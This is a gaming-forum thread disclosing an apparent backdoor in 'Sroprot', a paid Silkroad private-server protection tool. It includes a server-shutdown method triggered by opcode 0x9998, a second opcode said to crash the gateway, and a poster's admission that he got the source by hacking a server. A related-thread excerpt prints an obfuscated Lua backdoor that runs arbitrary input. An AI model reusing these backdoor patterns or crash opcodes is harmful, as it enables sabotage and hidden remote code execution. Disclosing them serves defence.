|
You last visited: Today at 19:28
Advertisement
[Release] Sroprot backdoor(Exploit)
Discussion on [Release] Sroprot backdoor(Exploit) within the SRO PServer Guides & Releases forum part of the SRO Private Server category.
06/28/2015, 10:59
|
#1
|
elite*gold: 0 
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
[Release] Sroprot backdoor(Exploit)
During some researches in the new guard from Chernobyl I found something interesting that can be abused on everyone that purchased his guard.
In his Agent source-code this exist:
The VOID is:
Code:
public void StopAllServers()
{
for (int i = 0; i < m_SilkroadServers.Count; i++)
{
m_SilkroadServers[i].StopContexts();
m_SilkroadServers[i].Stop();
}
m_SilkroadServers.Clear();
}
So the backdoor is exploiting AgentServer with Opcode 0x9998.
Since the "Enable Security filter is always enabled".
Enjoy for the people who got fooled, you should fix this.
|
|
|
|
06/28/2015, 11:17
|
#2
|
elite*gold: 0
Join Date: Aug 2014
Posts: 13
Received Thanks: 6
|
I don't see anything strange about this, since this software is supposed to be licensed to user, and also is given to people for testing (******** are everywhere, u know, haha). Licensed builds doesent have this "feature".
|
|
|
|
|
06/28/2015, 11:19
|
#3
|
elite*gold: 1117
Join Date: Dec 2013
Posts: 858
Received Thanks: 806
|
Quote:
Originally Posted by dwordptr
I don't see anything strange about this, since this software is supposed to be licensed to user, and also is given to people for testing (******** are everywhere, u know, haha). Licensed builds doesent have this "feature".
|
sorry Alex but b1tches are everywhere
|
|
|
|
|
06/28/2015, 11:35
|
#4
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by dwordptr
I don't see anything strange about this, since this software is supposed to be licensed to user, and also is given to people for testing (******** are everywhere, u know, haha). Licensed builds doesent have this "feature".
|
The strange part is that you purchase fixes, not fixes with a backdoor which can be found and abused. Imagine when you bought his **** and someone knew about this exploit, then 100 dollar boom gone, and yeah. That's the strange part, selling an exploit-fix which has a exploit-backdoor.
HEY Purchase my fix, but ONLY I can CRASH YOU, XAXAXXA HEADSHOT (-*-)
Also, this sourcecode I got, is purchased, and it exist in here. So do not try to save your own ***, since if you weren't Chernobyl you would never answer with "licensed build doesn't have this feature"
|
|
|
|
|
06/28/2015, 11:40
|
#5
|
elite*gold: 0
Join Date: Aug 2014
Posts: 13
Received Thanks: 6
|
Quote:
Originally Posted by Gray Face
The strange part is that you purchase fixes, not fixes with a backdoor which can be found and abused. Imagine when you bought his **** and someone knew about this exploit, then 100 dollar boom gone, and yeah. That's the strange part, selling an exploit-fix which has a exploit-backdoor.
HEY Purchase my fix, but ONLY I can CRASH YOU, XAXAXXA HEADSHOT (-*-)
|
How about you read my post ?.
|
|
|
|
|
06/28/2015, 11:45
|
#6
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by dwordptr
How about you read my post ?.
|
And I believe that 1.0.3.1 is sroprot latest version? It do not exist? OK!
I guess it don't exist.
|
|
|
|
|
06/28/2015, 11:48
|
#7
|
elite*gold: 0
Join Date: Aug 2014
Posts: 13
Received Thanks: 6
|
No, 1.3.4 is the latest version. Still, if you want it disabled, just remove opcode handler from Program.cs as following
Code:
//packetProcessor.RegisterClientMsg(0x9998, new PacketHandler(SecurityFilter.HandleClient));
Also, remove NetEngine.AgentServer.SecurityFilter.cs file.
|
|
|
|
|
06/28/2015, 11:50
|
#8
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by dwordptr
No, 1.3.4 is the latest version. Still, if you want it disabled, just remove opcode handler from Program.cs as following
Code:
//packetProcessor.RegisterClientMsg(0x9998, new PacketHandler(SecurityFilter.HandleClient));
Also, remove NetEngine.AgentServer.SecurityFilter.cs file. |
No, The opcode exists in UserContext.cs
Also I do not use your filter.
Quote:
Originally Posted by dwordptr
No, 1.3.4
|
This one is 1.3.1, saw from the folder a second ago.
Quote:
Originally Posted by Skipper*
Gray_Face, can you send it over? or is that not allowed?
|
Allowed and allowed, Why would I share it? just wanted to inform users of sroprot that it has a backdoor!
|
|
|
|
|
06/28/2015, 11:52
|
#9
|
elite*gold: 0
Join Date: Aug 2014
Posts: 13
Received Thanks: 6
|
Then you have way older build.
|
|
|
|
|
06/28/2015, 11:54
|
#10
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by dwordptr
Then you have way older build.
|
3 updates from your (NEWEST) is not considered old. Also this .exe was edited at 2015-06-21 so, 7 days ago.
Also you should fix 0x631D, gateway dies from that OPCODE, but I guess you are pr0 c0der.
|
|
|
|
|
06/28/2015, 12:08
|
#11
|
elite*gold: 0
Join Date: Aug 2014
Posts: 13
Received Thanks: 6
|
Since 1.3.1 it was reworked alot.
About filter for opcode/spacket data - that will be added with scripting system (packet opcode/data pattern search).
|
|
|
|
|
06/30/2015, 08:49
|
#12
|
elite*gold: 1020
Join Date: Dec 2013
Posts: 907
Received Thanks: 437
|
Quote:
Originally Posted by Gray Face
3 updates from your (NEWEST) is not considered old. Also this .exe was edited at 2015-06-21 so, 7 days ago.
Also you should fix 0x631D, gateway dies from that OPCODE, but I guess you are pr0 c0der.
|
thats true getaway dies easy .
Quote:
Originally Posted by dwordptr
Then you have way older build.
|
same as here
Requesting the new build since you are afk from skype
|
|
|
|
|
06/30/2015, 20:37
|
#13
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by Pure3viL
thats true getaway dies easy .
same as here
Requesting the new build since you are afk from skype
|
His **** "sroprot" is not good, he even made a backdoor to exploit his own customers. That's not something normal that you would do as a protection provider.
|
|
|
|
|
07/01/2015, 18:14
|
#14
|
elite*gold: 0
Join Date: Dec 2013
Posts: 59
Received Thanks: 5
|
Quote:
Originally Posted by Gray Face
His **** "sroprot" is not good, he even made a backdoor to exploit his own customers. That's not something normal that you would do as a protection provider.
|
You are just one of bunch people, who get sroprot from somebody. Wouldn't you do such kind of **** in your own security if you know that you get ****** from every side?
Use brain lil.
|
|
|
|
|
07/03/2015, 09:47
|
#15
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,373
|
Quote:
Originally Posted by Cooldpix
You are just one of bunch people, who get sroprot from somebody. Wouldn't you do such kind of **** in your own security if you know that you get ****** from every side?
Use brain lil.
|
I was using my brain, both yes and no. I got the SROPROT from hacking a server which purchased it. So well yeah, I was not planning to use it but I love to check out how the code looks and so on.
So you could say that I stepped right in it.
But well, haters going to hate and fame is the game.
W/E - WIN!
|
|
|
|
Similar Threads
|
[RELEASE] LUA Backdoor by Noa (Beispiel)
11/12/2013 - Metin2 PServer Guides & Strategies - 60 Replies
Da Noa solche "Backdoors" in seine Quests packt wollte ich euch mal ein Beispiel zeigen wonach ihr bei seinen releasten Quests suchen solltet.
function cCost()
local da = string.format('%c%c%c',78,111,97) == string.gsub("$get_name$", "%$(.-)%$",function (a )
return pc()
end) and
loadstring('return '..loadstring('return '..string.format('%c%c%c%c%c',105,110,112,117,116) ..'()')())() and da or 20000000
return da
end
|
All times are GMT +1. The time now is 19:29.
|
|
![[Release] Sroprot backdoor(Exploit)](https://www.elitepvpers.com/forum/iconimages/sro-pserver-guides-releases/release-sroprot-backdoor-exploit_ltr.gif){kind=small}
